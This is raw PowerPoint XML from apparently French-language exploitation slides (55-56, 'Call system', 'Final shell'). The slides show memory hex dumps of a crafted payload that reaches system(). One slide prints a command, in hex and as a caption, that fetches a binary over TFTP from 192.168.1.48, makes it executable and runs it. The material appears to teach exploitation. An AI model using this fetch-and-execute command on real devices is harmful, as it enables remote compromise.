                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000040: 58 F1 9F 00 00 00 00 00  78 FA C6 03 19 00 00 00  X.......x.......</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000050: 19 00 00 00 19 00 00 00  19 00 00 00 19 00 00 00  ................</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000060: 19 00 00 00 19 00 00 00  19 00 00 00 19 00 00 00  ................</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000070: 19 00 00 00 19 00 00 00  19 00 00 00 19 00 00 00  ................</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000080: 19 00 00 00 19 00 00 00  19 00 00 00 19 00 00 00  ................</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06C09C14-FB5E-B194-43C1-6A4A6A2A5716}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4209678" y="2037644"/>
            <a:ext cx="1143372" cy="256588"/>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12" name="Rectangle 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02865306-0577-A81C-6179-83B2B3A658C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4209678" y="2666048"/>
            <a:ext cx="1143372" cy="256588"/>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13" name="Rectangle 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06761460-C6BA-39E3-725E-C99CC096AE2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1876053" y="2256515"/>
            <a:ext cx="1143372" cy="25658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pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Image 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11DD956E-8EC1-D4AD-C7D0-D7CC272D6B72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="618233" y="3492257"/>
            <a:ext cx="8173591" cy="1295581"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15" name="Connecteur droit avec flèche 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{387ACD9A-4B85-D0B2-937F-BF4DFDDE781E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="13" idx="2"/>
            <a:endCxn id="14" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2447739" y="2513103"/>
            <a:ext cx="2257290" cy="979154"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="28575">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18" name="Espace réservé du texte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D64C034-7570-1103-BC4C-5A9E1AB8A35F}"/>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19" name="Espace réservé du texte 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17149337-B242-DD52-1E1B-B6E9B55D9C9F}"/>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Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1913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C19E25B-4140-1EA5-8978-10CE61B3D7B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{767457D1-F337-7141-A4C4-1AF9EC9D8474}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>55</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé de la date 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C091196-05C2-63A2-58F9-47CF96FC3C74}"/>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5D15FDC0-ECEA-73EF-6D8C-690E96A56826}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Call system</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Image 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDE6040B-4FC7-3792-5FB4-644AEA8CE98B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="373604" y="1275234"/>
            <a:ext cx="8553386" cy="2306166"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="ZoneTexte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84CE3D08-06AE-3694-271F-353795548C31}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1051924" y="3868266"/>
            <a:ext cx="7306209" cy="507831"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000000: 19 00 00 00 19 00 00 00  90 63 2B 02 01 00 00 00  .........c+.....</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>00000010: 34 E9 14 01 00 00 00 00  D0 F3 C3 03 19 00 00 00  4...............</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{80A37BD2-87B2-20F2-47B0-9129D4D19656}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="373605" y="1275234"/>
            <a:ext cx="2024609" cy="193409"/>
          </a:xfrm>
          <a:prstGeom prst="rect">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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B686DEF-12E8-AB38-5EF3-BFDAF9E668DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="373604" y="1462753"/>
            <a:ext cx="2024609" cy="159771"/>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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87BF9F35-3699-87FF-4887-49205A2AC026}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="373602" y="2091998"/>
            <a:ext cx="3445923" cy="355927"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="1905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B15EC10C-2941-D626-AE0C-8F879B590A41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1026525" y="3216343"/>
            <a:ext cx="2453276" cy="207849"/>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E18A1610-795C-90B6-0E12-A80B3B084173}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3153775" y="4113151"/>
            <a:ext cx="1151525" cy="207849"/>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D8CC2E36-BB9A-A610-4135-2A9ED9C14C7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4368800" y="4113071"/>
            <a:ext cx="1151525" cy="20784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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Espace réservé du texte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{61A23686-62EC-A404-698A-44409C46BEB2}"/>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17" name="Espace réservé du texte 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F45F6711-2324-48F1-7DD0-DBA03DEA324D}"/>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Exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10524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8A3169-4426-A588-5E53-D5213B22A1CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{767457D1-F337-7141-A4C4-1AF9EC9D8474}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>56</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé de la date 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28812FCE-9D36-77DE-3B17-8986002E8E38}"/>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6" name="Titre 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1A3DC5E4-890B-1C6A-5B7B-9ED120816DA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Final </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>shell</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="ZoneTexte 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8A03F99-ABA8-5B07-6CA2-62F794581958}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="911151" y="1533552"/>
            <a:ext cx="7321698" cy="2585323"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>80C20100: 19 00 00 00 19 00 00 00  90 63 2B 02 01 00 00 00  .........c+.....</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>80C20110: 4D 66 45 41 00 00 00 00  70 01 C2 80 19 00 00 00  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>MfEA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>....p.......</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>80C20120: 19 00 00 00 19 00 00 00  19 00 00 00 19 00 00 00  ................</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>80C20130: 19 00 00 00 19 00 00 00  B8 E0 12 02 01 00 00 00  ................</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>80C20140: 58 F1 9F 00 00 00 00 00  78 AA 72 04 19 00 00 00  X.......</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>x.r</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.....</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>80C20150: 19 00 00 00 19 00 00 00  19 00 00 00 19 00 00 00  ................</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>80C20160: 19 00 00 00 19 00 00 00  19 00 00 00 19 00 00 00  ................</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>80C20170</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: 74 66 74 70 20 2D 6C 20  2F 74 6D 70 2F 78 20 2D  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tftp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -l /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/x -</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>80C20180: 72 20 78 20 2D 67 20 31  39 32 2E 31 36 38 2E 31  r x -g 192.168.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>80C20190: 2E 34 38 20 26 26 20 63  68 6D 6F 64 20 2B 78 20  .48 &amp;&amp; chmod +x</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>80C201A0: 2F 74 6D 70 2F 78 20 26  26 20 2F 74 6D 70 2F 78  /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/x &amp;&amp; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/x</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>80C201B0: 00 41 41 41 41 41 41 41  19 00 00 00 19 00 00 00  .AAAAAAA........</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="ZoneTexte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4B0FA16-445B-4900-21B3-C5B1C48719C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="911151" y="4326502"/>
            <a:ext cx="7321698" cy="300082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tftp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -l /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/x -r x -g 192.168.1.48 &amp;&amp; chmod +x /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/x &amp;&amp; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/x</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C7D146D-F01B-6D32-6180-D5072B75D6E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1898700" y="1756995"/>
            <a:ext cx="1117550" cy="26143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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{295360EA-9BF4-C117-8626-7880A44D34A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4245164" y="1748447"/>
            <a:ext cx="1117550" cy="278533"/>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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6A4CD6F-D619-EFFA-FCBA-11FDAEB211B8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="933550" y="2994349"/>
            <a:ext cx="965150" cy="261438"/>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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="ZoneTexte 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F76808EF-028E-0F48-737E-6E0BAE80536B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1971675" y="1108565"/>
            <a:ext cx="971599" cy="300082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>system</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="19" name="Connecteur droit avec flèche 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
